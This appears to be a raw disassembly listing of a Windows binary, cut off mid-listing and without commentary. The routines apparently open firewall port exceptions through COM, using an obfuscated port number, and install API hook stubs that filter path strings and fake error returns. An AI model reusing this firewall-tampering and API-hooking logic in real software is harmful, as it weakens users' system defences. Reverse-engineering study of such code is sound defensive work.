ppv = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
xor esi, esi
push 6 ; dwCoInit
push esi ; pvReserved
mov [ebp+ppv], esi
mov [ebp+var_4], esi
mov [edi], esi
call CoInitializeEx
mov ebx, eax
cmp ebx, 80010106h
jz short loc_9A4C37
cmp ebx, esi
jl short loc_9A4C6D
loc_9A4C37: ; CODE XREF: sub_9A4C0F+22�j
lea eax, [ebp+ppv]
push eax ; ppv
push offset riid ; riid
push 1 ; dwClsContext
push esi ; pUnkOuter
push offset rclsid ; rclsid
call CoCreateInstance
test eax, eax
jl short loc_9A4C6D
mov eax, [ebp+ppv]
mov ecx, [eax]
lea edx, [ebp+var_4]
push edx
push eax
call dword ptr [ecx+1Ch]
test eax, eax
jl short loc_9A4C6D
mov eax, [ebp+var_4]
mov ecx, [eax]
push edi
push eax
call dword ptr [ecx+1Ch]
loc_9A4C6D: ; CODE XREF: sub_9A4C0F+26�j
; sub_9A4C0F+41�j ...
mov eax, [ebp+var_4]
cmp eax, esi
jz short loc_9A4C7A
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A4C7A: ; CODE XREF: sub_9A4C0F+63�j
mov eax, [ebp+ppv]
cmp eax, esi
jz short loc_9A4C87
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A4C87: ; CODE XREF: sub_9A4C0F+70�j
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_9A4C0F endp
; =============== S U B R O U T I N E =======================================
sub_9A4C8D proc near ; CODE XREF: sub_9A5033+EE�p
; sub_9A514A+C5�p
arg_0 = dword ptr 4
test eax, eax
jz short loc_9A4C97
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A4C97: ; CODE XREF: sub_9A4C8D+2�j
cmp [esp+arg_0], 0
jl short locret_9A4CA4
jmp CoUninitialize
; ---------------------------------------------------------------------------
locret_9A4CA4: ; CODE XREF: sub_9A4C8D+F�j
retn
sub_9A4C8D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A4CA5 proc near ; CODE XREF: sub_9A4D36+3C�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
and dword ptr [ebx], 0
mov ecx, [eax]
and [ebp+var_4], 0
and [ebp+var_8], 0
push esi
lea edx, [ebp+var_8]
push edx
push eax
call dword ptr [ecx+48h]
mov esi, eax
test esi, esi
jl short loc_9A4D17
mov eax, [ebp+var_8]
mov ecx, [eax]
lea edx, [ebp+var_4]
push edx
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call dword ptr [ecx+28h]
test eax, eax
jl short loc_9A4D15
mov eax, [ebp+var_4]
mov ecx, [eax]
lea edx, [ebp+var_C]
push edx
push eax
call dword ptr [ecx+4Ch]
mov esi, eax
test esi, esi
jl short loc_9A4D17
cmp word ptr [ebp+var_C], 0
jnz short loc_9A4D0D
mov eax, [ebp+var_4]
mov ecx, [eax]
push 0FFFFFFFFh
push eax
call dword ptr [ecx+50h]
mov esi, eax
test esi, esi
jl short loc_9A4D17
or [ebp+var_C], 0FFFFFFFFh
loc_9A4D0D: ; CODE XREF: sub_9A4CA5+51�j
mov dword ptr [ebx], 1
jmp short loc_9A4D17
; ---------------------------------------------------------------------------
loc_9A4D15: ; CODE XREF: sub_9A4CA5+37�j
xor esi, esi
loc_9A4D17: ; CODE XREF: sub_9A4CA5+20�j
; sub_9A4CA5+4A�j ...
mov eax, [ebp+var_4]
test eax, eax
jz short loc_9A4D24
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A4D24: ; CODE XREF: sub_9A4CA5+77�j
mov eax, [ebp+var_8]
test eax, eax
jz short loc_9A4D31
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A4D31: ; CODE XREF: sub_9A4CA5+84�j
mov eax, esi
pop esi
leave
retn
sub_9A4CA5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A4D36(int,int,OLECHAR *psz)
sub_9A4D36 proc near ; CODE XREF: sub_9A5033+C6�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
ppv = dword ptr -8
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
psz = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
lea ecx, [ebp+var_4]
mov esi, eax
mov eax, [esi]
xor edi, edi
push ecx
push esi
mov [ebp+var_14], edi
mov [ebp+ppv], edi
mov [ebp+var_C], edi
call dword ptr [eax+28h]
test eax, eax
jl short loc_9A4D67
cmp [ebp+var_4], di
jz short loc_9A4D67
mov eax, [esi]
push edi
push esi
call dword ptr [eax+2Ch]
loc_9A4D67: ; CODE XREF: sub_9A4D36+22�j
; sub_9A4D36+28�j
push [ebp+arg_4]
lea ebx, [ebp+var_10]
push [ebp+arg_0]
mov eax, esi
call sub_9A4CA5
mov ebx, eax
cmp ebx, edi
pop ecx
pop ecx
jl loc_9A4E1A
cmp [ebp+var_10], edi
jnz loc_9A4E1A
mov eax, [esi]
lea ecx, [ebp+var_C]
push ecx
push esi
call dword ptr [eax+48h]
mov ebx, eax
cmp ebx, edi
jl short loc_9A4E1A
lea eax, [ebp+ppv]
push eax ; ppv
push offset stru_9A284C ; riid
push 1 ; dwClsContext
push edi ; pUnkOuter
push offset stru_9A283C ; rclsid
call CoCreateInstance
mov ebx, eax
cmp ebx, edi
jl short loc_9A4E1A
mov eax, [ebp+ppv]
push [ebp+arg_0]
mov ecx, [eax]
push eax
call dword ptr [ecx+38h]
mov ebx, eax
cmp ebx, edi
jl short loc_9A4E1A
mov eax, [ebp+ppv]
push [ebp+arg_4]
mov ecx, [eax]
push eax
call dword ptr [ecx+30h]
mov ebx, eax
cmp ebx, edi
jl short loc_9A4E1A
push [ebp+psz] ; psz
call SysAllocString
mov esi, eax
push esi ; BSTR
call SysStringLen
test eax, eax
jnz short loc_9A4DFA
mov ebx, 8007000Eh
jmp short loc_9A4E1D
; ---------------------------------------------------------------------------
loc_9A4DFA: ; CODE XREF: sub_9A4D36+BB�j
mov eax, [ebp+ppv]
mov ecx, [eax]
push esi
push eax
call dword ptr [ecx+20h]
mov ebx, eax
cmp ebx, edi
jl short loc_9A4E1D
mov eax, [ebp+var_C]
push [ebp+ppv]
mov ecx, [eax]
push eax
call dword ptr [ecx+20h]
mov ebx, eax
jmp short loc_9A4E1D
; ---------------------------------------------------------------------------
loc_9A4E1A: ; CODE XREF: sub_9A4D36+47�j
; sub_9A4D36+50�j ...
mov esi, [ebp+var_14]
loc_9A4E1D: ; CODE XREF: sub_9A4D36+C2�j
; sub_9A4D36+D2�j ...
push esi ; bstrString
call SysFreeString
mov eax, [ebp+ppv]
cmp eax, edi
jz short loc_9A4E31
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A4E31: ; CODE XREF: sub_9A4D36+F3�j
mov eax, [ebp+var_C]
cmp eax, edi
jz short loc_9A4E3E
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A4E3E: ; CODE XREF: sub_9A4D36+100�j
pop edi
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_9A4D36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A4E45(wchar_t *Str2)
sub_9A4E45 proc near ; CODE XREF: sub_9A514A+97�p
pvarg = VARIANTARG ptr -2Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
bstrString = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Str2 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
mov ecx, [eax]
push edi
xor edi, edi
lea edx, [ebp+var_C]
push edx
push eax
mov [ebp+bstrString], edi
mov [ebp+var_4], edi
mov [ebp+var_C], edi
mov [ebp+var_14], edi
mov [ebp+var_8], edi
call dword ptr [ecx+48h]
cmp eax, edi
jl loc_9A4F8D
mov eax, [ebp+var_C]
mov ecx, [eax]
push esi
lea edx, [ebp+var_14]
push edx
push eax
call dword ptr [ecx+2Ch]
mov esi, eax
cmp esi, edi
jl loc_9A4F81
mov eax, [ebp+var_14]
mov ecx, [eax]
lea edx, [ebp+var_8]
push edx
push offset dword_9A27DC
push eax
call dword ptr [ecx]
mov esi, eax
cmp esi, edi
jl loc_9A4F78
mov eax, [ebp+var_8]
mov ecx, [eax]
xor esi, esi
push eax
inc esi
call dword ptr [ecx+14h]
lea eax, [ebp+pvarg]
push eax ; pvarg
call VariantInit
loc_9A4EB8: ; CODE XREF: sub_9A4E45+124�j
mov eax, [ebp+var_8]
mov ecx, [eax]
push edi
lea edx, [ebp+pvarg]
push edx
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_9A4F6F
mov eax, dword ptr [ebp+pvarg.anonymous_0+8]
mov ecx, [eax]
lea edx, [ebp+var_4]
push edx
push offset stru_9A284C
push eax
call dword ptr [ecx]
test eax, eax
jl short loc_9A4F5C
mov eax, [ebp+var_4]
mov ecx, [eax]
lea edx, [ebp+bstrString]
push edx
push eax
call dword ptr [ecx+1Ch]
test eax, eax
jl short loc_9A4F53
push [ebp+Str2] ; Str
call wcslen
push eax ; MaxCount
push [ebp+Str2] ; Str2
push [ebp+bstrString] ; Str1
call wcsncmp
add esp, 10h
test eax, eax
jnz short loc_9A4F4A
mov eax, [ebp+var_4]
mov ecx, [eax]
lea edx, [ebp+var_1C]
push edx
push eax
call dword ptr [ecx+34h]
test eax, eax
jl short loc_9A4F4A
mov eax, [ebp+var_4]
mov ecx, [eax]
lea edx, [ebp+var_18]
push edx
push eax
call dword ptr [ecx+2Ch]
test eax, eax
jl short loc_9A4F4A
push [ebp+var_18]
mov eax, [ebp+var_C]
push [ebp+var_1C]
mov ecx, [eax]
push eax
call dword ptr [ecx+24h]
test eax, eax
jl short loc_9A4F4A
xor esi, esi
loc_9A4F4A: ; CODE XREF: sub_9A4E45+CC�j
; sub_9A4E45+DD�j ...
push [ebp+bstrString] ; bstrString
call SysFreeString
loc_9A4F53: ; CODE XREF: sub_9A4E45+AF�j
mov eax, [ebp+var_4]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A4F5C: ; CODE XREF: sub_9A4E45+9E�j
lea eax, [ebp+pvarg]
push eax ; pvarg
call VariantClear
cmp esi, 1
jz loc_9A4EB8
loc_9A4F6F: ; CODE XREF: sub_9A4E45+85�j
mov eax, [ebp+var_8]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A4F78: ; CODE XREF: sub_9A4E45+57�j
mov eax, [ebp+var_14]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A4F81: ; CODE XREF: sub_9A4E45+3C�j
mov eax, [ebp+var_C]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
mov eax, esi
pop esi
loc_9A4F8D: ; CODE XREF: sub_9A4E45+24�j
pop edi
leave
retn
sub_9A4E45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_9A4F90 proc near ; CODE XREF: sub_9B6504+31�p
VersionInformation= _OSVERSIONINFOA ptr -0A0h
var_C = word ptr -0Ch
var_4 = dword ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 0A0h
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+78h+var_4], eax
lea eax, [ebp+78h+VersionInformation]
push eax ; lpVersionInformation
mov [ebp+78h+VersionInformation.dwOSVersionInfoSize], 9Ch
call GetVersionExA
test eax, eax
jz short loc_9A4FDE
cmp [ebp+78h+VersionInformation.dwMajorVersion], 5
jnz short loc_9A4FDE
xor eax, eax
inc eax
cmp [ebp+78h+VersionInformation.dwMinorVersion], eax
jnz short loc_9A4FD1
cmp [ebp+78h+var_C], 2
jnb short loc_9A4FDE
jmp short loc_9A4FE0
; ---------------------------------------------------------------------------
loc_9A4FD1: ; CODE XREF: sub_9A4F90+36�j
cmp [ebp+78h+VersionInformation.dwMinorVersion], 2
jnz short loc_9A4FDE
cmp [ebp+78h+var_C], 0
jz short loc_9A4FE0
loc_9A4FDE: ; CODE XREF: sub_9A4F90+28�j
; sub_9A4F90+2E�j ...
xor eax, eax
loc_9A4FE0: ; CODE XREF: sub_9A4F90+3F�j
; sub_9A4F90+4C�j
mov ecx, [ebp+78h+var_4]
xor ecx, ebp
call sub_9AAAC1
add ebp, 78h
leave
retn
sub_9A4F90 endp
; =============== S U B R O U T I N E =======================================
sub_9A4FEF proc near ; CODE XREF: sub_9B6504:loc_9B1FE0�p
ThreadId = dword ptr -4
push ecx
push esi
push edi
lea eax, [esp+0Ch+ThreadId]
push eax ; lpThreadId
xor edi, edi
push edi ; dwCreationFlags
push edi ; lpParameter
push offset sub_9A4B7B ; lpStartAddress
push edi ; dwStackSize
push edi ; lpThreadAttributes
call CreateThread
mov esi, eax
push 2710h ; dwMilliseconds
push esi ; hHandle
call WaitForSingleObject
cmp eax, 102h
jnz short loc_9A5025
push edi ; dwExitCode
push esi ; hThread
call TerminateThread
loc_9A5025: ; CODE XREF: sub_9A4FEF+2C�j
push esi ; hObject
call CloseHandle
xor eax, eax
pop edi
inc eax
pop esi
pop ecx
retn
sub_9A4FEF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A5033 proc near ; CODE XREF: sub_9AE400+14F2�p
var_43C = dword ptr -43Ch
var_438 = dword ptr -438h
var_434 = dword ptr -434h
var_430 = dword ptr -430h
var_42C = byte ptr -42Ch
var_328 = byte ptr -328h
psz = word ptr -224h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = word ptr 8
arg_4 = dword ptr 0Ch
push 42Ch
push offset stru_9A2868
call __SEH_prolog
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
xor ebx, ebx
mov [ebp+var_434], ebx
mov [ebp+ms_exc.disabled], ebx
mov [ebp+var_43C], ebx
mov [ebp+var_438], 80004005h
mov [ebp+var_430], ebx
lea edi, [ebp+var_430]
call sub_9A4C0F
mov [ebp+var_438], eax
cmp [ebp+var_430], ebx
jz loc_9A5115
movzx esi, [ebp+arg_0]
lea eax, [ebp+var_328]
push eax
xor eax, eax
cmp [ebp+arg_4], 6
setnz al
inc eax
push eax
mov eax, esi
xor eax, 2ABC1DEFh
push eax
call sub_9AE860
add esp, 0Ch
push eax
lea eax, [ebp+var_42C]
push eax
call sub_9AEE40
pop ecx
push eax
push offset aSS_0 ; "%S %S"
push 104h ; Count
lea eax, [ebp+psz]
push eax ; Dest
call _snwprintf
mov [ebp+var_1E], bx
lea eax, [ebp+psz]
push eax ; psz
xor eax, eax
cmp [ebp+arg_4], 6
setnz al
dec eax
and eax, 0FFFFFFF5h
add eax, 11h
push eax ; int
push esi ; int
mov eax, [ebp+var_430]
call sub_9A4D36
add esp, 20h
mov [ebp+var_43C], eax
cmp eax, ebx
jl short loc_9A5115
mov [ebp+var_434], 1
loc_9A5115: ; CODE XREF: sub_9A5033+51�j
; sub_9A5033+D6�j
push [ebp+var_438]
mov eax, [ebp+var_430]
call sub_9A4C8D
pop ecx
jmp short loc_9A5130
; ---------------------------------------------------------------------------
loc_9A5129: ; DATA XREF: .text:stru_9A2868�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A512D: ; DATA XREF: .text:stru_9A2868�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A5130: ; CODE XREF: sub_9A5033+F4�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_434]
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
call __SEH_epilog
retn
sub_9A5033 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A514A proc near ; CODE XREF: sub_9B6504:loc_9B5F40�p
var_33C = dword ptr -33Ch
var_338 = dword ptr -338h
var_334 = dword ptr -334h
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
MultiByteStr = byte ptr -328h
Str2 = word ptr -224h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 32Ch
push offset stru_9A2878
call __SEH_prolog
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
xor esi, esi
mov [ebp+var_334], esi
mov [ebp+ms_exc.disabled], esi
push 104h ; cchWideChar
lea eax, [ebp+Str2]
push eax ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
push esi ; dwFlags
push esi ; CodePage
call MultiByteToWideChar
test eax, eax
jz loc_9A521E
mov [ebp+var_33C], esi
mov [ebp+var_338], 80004005h
mov [ebp+var_32C], esi
lea edi, [ebp+var_32C]
call sub_9A4C0F
mov [ebp+var_338], eax
cmp [ebp+var_32C], esi
jz short loc_9A5203
mov [ebp+var_330], esi
xor edi, edi
inc edi
loc_9A51CB: ; CODE XREF: sub_9A514A+B7�j
cmp [ebp+var_330], 14h
jge short loc_9A5203
lea eax, [ebp+Str2]
push eax ; Str2
mov eax, [ebp+var_32C]
call sub_9A4E45
pop ecx
mov [ebp+var_33C], eax
cmp eax, esi
jl short loc_9A5203
mov [ebp+var_334], edi
cmp eax, edi
jz short loc_9A5203
inc [ebp+var_330]
jmp short loc_9A51CB
; ---------------------------------------------------------------------------
loc_9A5203: ; CODE XREF: sub_9A514A+76�j
; sub_9A514A+88�j ...
push [ebp+var_338]
mov eax, [ebp+var_32C]
call sub_9A4C8D
pop ecx
jmp short loc_9A521E
; ---------------------------------------------------------------------------
loc_9A5217: ; DATA XREF: .text:stru_9A2878�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A521B: ; DATA XREF: .text:stru_9A2878�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A521E: ; CODE XREF: sub_9A514A+43�j
; sub_9A514A+CB�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_334]
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
call __SEH_epilog
retn
sub_9A514A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_9A5238 proc near ; CODE XREF: sub_9AE400+32�p
; sub_9B6504:loc_9B1FE5�p
VersionInformation= _OSVERSIONINFOA ptr -0A0h
var_C = word ptr -0Ch
var_4 = dword ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 0A0h
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+78h+var_4], eax
lea eax, [ebp+78h+VersionInformation]
push eax ; lpVersionInformation
mov [ebp+78h+VersionInformation.dwOSVersionInfoSize], 9Ch
call GetVersionExA
test eax, eax
jz short loc_9A5292
xor eax, eax
cmp [ebp+78h+VersionInformation.dwMajorVersion], 5
jb short loc_9A5294
inc eax
cmp [ebp+78h+VersionInformation.dwMajorVersion], 5
jnz short loc_9A5294
cmp [ebp+78h+VersionInformation.dwMinorVersion], 0
jz short loc_9A5292
cmp [ebp+78h+VersionInformation.dwMinorVersion], eax
jnz short loc_9A5285
cmp [ebp+78h+var_C], 2
jnb short loc_9A5294
jmp short loc_9A5292
; ---------------------------------------------------------------------------
loc_9A5285: ; CODE XREF: sub_9A5238+42�j
cmp [ebp+78h+VersionInformation.dwMinorVersion], 2
jnz short loc_9A5294
cmp [ebp+78h+var_C], 0
jnz short loc_9A5294
loc_9A5292: ; CODE XREF: sub_9A5238+28�j
; sub_9A5238+3D�j ...
xor eax, eax
loc_9A5294: ; CODE XREF: sub_9A5238+30�j
; sub_9A5238+37�j ...
mov ecx, [ebp+78h+var_4]
xor ecx, ebp
call sub_9AAAC1
add ebp, 78h
leave
retn
sub_9A5238 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A52A3(wchar_t *Str)
sub_9A52A3 proc near ; CODE XREF: sub_9A52FE+F�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
Str = dword ptr 8
push 0Ch
push offset stru_9A2890
call __SEH_prolog
mov [ebp+var_1C], 1
xor esi, esi
mov [ebp+ms_exc.disabled], esi
cmp [ebp+Str], esi
jz short loc_9A52F1
push offset a__ ; "\\..\\"
push [ebp+Str] ; Str
call wcsstr
pop ecx
pop ecx
test eax, eax
jnz short loc_9A52E5
push [ebp+Str] ; Str
call wcslen
pop ecx
cmp eax, 0C8h
jbe short loc_9A52F1
loc_9A52E5: ; CODE XREF: sub_9A52A3+2F�j
mov [ebp+var_1C], esi
jmp short loc_9A52F1
; ---------------------------------------------------------------------------
loc_9A52EA: ; DATA XREF: .text:stru_9A2890�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A52EE: ; DATA XREF: .text:stru_9A2890�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A52F1: ; CODE XREF: sub_9A52A3+1B�j
; sub_9A52A3+40�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9A52A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_9A52FE(wchar_t *Str,int,int,int,int,int)
sub_9A52FE proc near ; DATA XREF: sub_9A5B0F+1�o
Str = dword ptr 8
push ebp
mov ebp, esp
cmp dword_9BB2E8, 0
jz short loc_9A5322
push [ebp+Str] ; Str
call sub_9A52A3
test eax, eax
pop ecx
jz short loc_9A5322
mov eax, dword_9BB2E8
add eax, 4
pop ebp
jmp eax
; ---------------------------------------------------------------------------
loc_9A5322: ; CODE XREF: sub_9A52FE+A�j
; sub_9A52FE+17�j
push 57h ; dwErrCode
call SetLastError
push 57h
pop eax
pop ebp
retn 18h
sub_9A52FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A5331 proc near ; CODE XREF: sub_9A535E+3E�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset stru_9A28A0
call __SEH_prolog
mov eax, [ebp+arg_0]
and [ebp+ms_exc.disabled], 0
mov cl, [eax]
or cl, 70h
mov [eax], cl
jmp short loc_9A5354
; ---------------------------------------------------------------------------
loc_9A534D: ; DATA XREF: .text:stru_9A28A0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A5351: ; DATA XREF: .text:stru_9A28A0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A5354: ; CODE XREF: sub_9A5331+1A�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call __SEH_epilog
retn
sub_9A5331 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A535E proc near ; DATA XREF: sub_9A5B2E+1�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, dword_9BB2EC
test eax, eax
jz short loc_9A53A7
push esi
push [ebp+arg_10]
add eax, 4
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call eax
cmp [ebp+arg_4], 22h
mov esi, eax
jnz short loc_9A53A2
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_9A53A2
cmp [ebp+arg_8], 0
jz short loc_9A53A2
cmp [ebp+arg_C], 0
jz short loc_9A53A2
push [ebp+arg_8]
call sub_9A5331
pop ecx
loc_9A53A2: ; CODE XREF: sub_9A535E+27�j
; sub_9A535E+2D�j ...
mov eax, esi
pop esi
jmp short loc_9A53AA
; ---------------------------------------------------------------------------
loc_9A53A7: ; CODE XREF: sub_9A535E+A�j
push 57h
pop eax
loc_9A53AA: ; CODE XREF: sub_9A535E+47�j
pop ebp
retn 14h
sub_9A535E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A53AE(char *lpFirst)
sub_9A53AE proc near ; CODE XREF: sub_9A53E9+F�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
lpFirst = dword ptr 8
push 0Ch
push offset stru_9A28B0
call __SEH_prolog
xor eax, eax
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], eax
cmp [ebp+lpFirst], eax
jz short loc_9A53DC
push [ebp+lpFirst] ; lpFirst
call sub_9A3FB6
pop ecx
mov [ebp+var_1C], eax
jmp short loc_9A53DC
; ---------------------------------------------------------------------------
loc_9A53D5: ; DATA XREF: .text:stru_9A28B0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A53D9: ; DATA XREF: .text:stru_9A28B0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A53DC: ; CODE XREF: sub_9A53AE+17�j
; sub_9A53AE+25�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9A53AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_9A53E9(char *lpFirst,int,int,int,int,int)
sub_9A53E9 proc near ; DATA XREF: sub_9A5B4D+5�o
lpFirst = dword ptr 8
push ebp
mov ebp, esp
cmp dword_9BB2F0, 0
jz short loc_9A540D
push [ebp+lpFirst] ; lpFirst
call sub_9A53AE
test eax, eax
pop ecx
jnz short loc_9A540D
mov eax, dword_9BB2F0
add eax, 4
pop ebp
jmp eax
; ---------------------------------------------------------------------------
loc_9A540D: ; CODE XREF: sub_9A53E9+A�j
; sub_9A53E9+17�j
push 5B4h ; dwErrCode
call SetLastError
mov eax, 5B4h
pop ebp
retn 18h
sub_9A53E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A5421(LPCSTR lpMultiByteStr)
sub_9A5421 proc near ; CODE XREF: sub_9A54C1+F�p
var_320 = dword ptr -320h
WideCharStr = word ptr -31Ch
First = byte ptr -11Ch
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
lpMultiByteStr = dword ptr 8
push 310h
push offset stru_9A28C0
call __SEH_prolog
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
mov eax, [ebp+lpMultiByteStr]
xor edi, edi
mov [ebp+var_320], edi
mov [ebp+ms_exc.disabled], edi
cmp eax, edi
jz short loc_9A54A7
mov esi, 100h
push esi ; cchWideChar
lea ecx, [ebp+WideCharStr]
push ecx ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push eax ; lpMultiByteStr
push edi ; dwFlags
push 0FDE9h ; CodePage
call MultiByteToWideChar
test eax, eax
jz short loc_9A54A7
push edi ; lpUsedDefaultChar
push edi ; lpDefaultChar
push esi ; cbMultiByte
lea eax, [ebp+First]
push eax ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
lea eax, [ebp+WideCharStr]
push eax ; lpWideCharStr
push edi ; dwFlags
push edi ; CodePage
call WideCharToMultiByte
test eax, eax
jz short loc_9A54A7
lea eax, [ebp+First]
push eax ; lpFirst
call sub_9A3FB6
pop ecx
mov [ebp+var_320], eax
jmp short loc_9A54A7
; ---------------------------------------------------------------------------
loc_9A54A0: ; DATA XREF: .text:stru_9A28C0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A54A4: ; DATA XREF: .text:stru_9A28C0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A54A7: ; CODE XREF: sub_9A5421+29�j
; sub_9A5421+49�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_320]
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
call __SEH_epilog
retn
sub_9A5421 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_9A54C1(LPCSTR lpMultiByteStr,int,int,int,int,int)
sub_9A54C1 proc near ; DATA XREF: sub_9A5B4D+1F�o
lpMultiByteStr = dword ptr 8
push ebp
mov ebp, esp
cmp dword_9BB2F4, 0
jz short loc_9A54E5
push [ebp+lpMultiByteStr] ; lpMultiByteStr
call sub_9A5421
test eax, eax
pop ecx
jnz short loc_9A54E5
mov eax, dword_9BB2F4
add eax, 4
pop ebp
jmp eax
; ---------------------------------------------------------------------------
loc_9A54E5: ; CODE XREF: sub_9A54C1+A�j
; sub_9A54C1+17�j
push 5B4h ; dwErrCode
call SetLastError
mov eax, 5B4h
pop ebp
retn 18h
sub_9A54C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A54F9 proc near ; CODE XREF: sub_9A556B+F�p
var_120 = dword ptr -120h
First = byte ptr -11Ch
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 110h
push offset stru_9A28D0
call __SEH_prolog
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
xor eax, eax
mov [ebp+ms_exc.disabled], eax
cmp ecx, eax
jz short loc_9A5554
push eax ; lpUsedDefaultChar
push eax ; lpDefaultChar
push 100h ; cbMultiByte
lea edx, [ebp+First]
push edx ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push ecx ; lpWideCharStr
push eax ; dwFlags
push eax ; CodePage
call WideCharToMultiByte
test eax, eax
jz short loc_9A5554
lea eax, [ebp+First]
push eax ; lpFirst
call sub_9A3FB6
pop ecx
mov [ebp+var_120], eax
jmp short loc_9A5554
; ---------------------------------------------------------------------------
loc_9A554D: ; DATA XREF: .text:stru_9A28D0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A5551: ; DATA XREF: .text:stru_9A28D0�o
